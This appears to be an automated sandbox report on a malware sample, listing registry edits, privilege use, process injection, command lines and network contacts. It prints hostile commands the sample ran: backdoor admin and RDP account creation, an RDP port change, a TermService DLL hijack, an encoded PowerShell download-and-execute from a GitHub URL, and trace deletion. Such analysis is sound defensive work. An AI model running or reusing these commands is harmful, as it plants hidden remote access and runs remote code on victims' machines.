Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Templers\exe2.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Templers\exe2.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3904 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe C:\Users\Admin\AppData\Roaming\Templers\exe1.exe
PID 3904 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe C:\Users\Admin\AppData\Roaming\Templers\exe1.exe
PID 3904 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
PID 3904 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
PID 3904 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
PID 2396 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Roaming\Templers\exe2.exe C:\Users\Public\Documents\Wondershare\NFWCHK.exe
PID 2396 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Roaming\Templers\exe2.exe C:\Users\Public\Documents\Wondershare\NFWCHK.exe
PID 2412 wrote to memory of 3292 N/A C:\Users\Admin\AppData\Roaming\Templers\exe1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2412 wrote to memory of 3292 N/A C:\Users\Admin\AppData\Roaming\Templers\exe1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3292 wrote to memory of 2460 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3292 wrote to memory of 2460 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2460 wrote to memory of 3972 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2460 wrote to memory of 3972 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3292 wrote to memory of 4028 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3292 wrote to memory of 4028 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3292 wrote to memory of 4144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3292 wrote to memory of 4144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3292 wrote to memory of 4404 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3292 wrote to memory of 4404 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3292 wrote to memory of 4824 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3292 wrote to memory of 4824 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3292 wrote to memory of 4844 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3292 wrote to memory of 4844 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3292 wrote to memory of 4864 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3292 wrote to memory of 4864 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3292 wrote to memory of 5044 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 3292 wrote to memory of 5044 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 5044 wrote to memory of 5064 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 5044 wrote to memory of 5064 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3292 wrote to memory of 5096 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3292 wrote to memory of 5096 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 5096 wrote to memory of 5112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 5096 wrote to memory of 5112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 5112 wrote to memory of 3960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 5112 wrote to memory of 3960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3960 wrote to memory of 2684 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3960 wrote to memory of 2684 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3292 wrote to memory of 3700 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3292 wrote to memory of 3700 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3700 wrote to memory of 3612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3700 wrote to memory of 3612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3612 wrote to memory of 4112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3612 wrote to memory of 4112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4112 wrote to memory of 4124 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4112 wrote to memory of 4124 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4248 wrote to memory of 4308 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4248 wrote to memory of 4308 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4308 wrote to memory of 4328 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4308 wrote to memory of 4328 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4348 wrote to memory of 4216 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4348 wrote to memory of 4216 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4216 wrote to memory of 4148 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4216 wrote to memory of 4148 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4256 wrote to memory of 4000 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4256 wrote to memory of 4000 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4000 wrote to memory of 4428 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4000 wrote to memory of 4428 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4412 wrote to memory of 4532 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4412 wrote to memory of 4532 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4532 wrote to memory of 4552 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4532 wrote to memory of 4552 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4580 wrote to memory of 4620 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4580 wrote to memory of 4620 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4620 wrote to memory of 4644 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe

"C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe"

C:\Users\Admin\AppData\Roaming\Templers\exe2.exe

"C:\Users\Admin\AppData\Roaming\Templers\exe2.exe"

C:\Users\Admin\AppData\Roaming\Templers\exe1.exe

"C:\Users\Admin\AppData\Roaming\Templers\exe1.exe"

C:\Users\Public\Documents\Wondershare\NFWCHK.exe

C:\Users\Public\Documents\Wondershare\NFWCHK.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\trshuemd\trshuemd.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2541.tmp" "c:\Users\Admin\AppData\Local\Temp\trshuemd\CSCB76A0FB192CC42A6896CCCC69F92E773.TMP"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc WVXHFeyt /add

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc WVXHFeyt /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc WVXHFeyt /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc WVXHFeyt

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc WVXHFeyt

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc WVXHFeyt

C:\Windows\System32\cmd.exe

cmd.exe /C wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe

cmd.exe /C wmic CPU get NAME

C:\Windows\System32\Wbem\WMIC.exe

wmic CPU get NAME

C:\Windows\System32\cmd.exe

cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 platform.wondershare.com udp
N/A 47.91.67.36:80 platform.wondershare.com tcp
N/A 8.8.8.8:53 raw.githubusercontent.com udp
N/A 185.199.108.133:443 raw.githubusercontent.com tcp
N/A 8.8.8.8:53 www.speedtest.net udp
N/A 151.101.2.219:80 www.speedtest.net tcp
N/A 151.101.2.219:443 www.speedtest.net tcp
N/A 151.101.2.219:80 www.speedtest.net tcp
N/A 8.8.8.8:53 c.speedtest.net udp
N/A 151.101.2.219:443 c.speedtest.net tcp
N/A 8.8.8.8:53 speedtest.kabeltex.nl udp
N/A 82.151.33.2:8080 speedtest.kabeltex.nl tcp
N/A 8.8.8.8:53 speedtest.zeelandnet.nl udp
N/A 212.115.192.180:8080 speedtest.zeelandnet.nl tcp
N/A 8.8.8.8:53 speedtest.worldstream.nl udp
N/A 185.182.195.78:8080 speedtest.worldstream.nl tcp
N/A 8.8.8.8:53 speedtest.caiw.net udp
N/A 62.45.44.26:8080 speedtest.caiw.net tcp
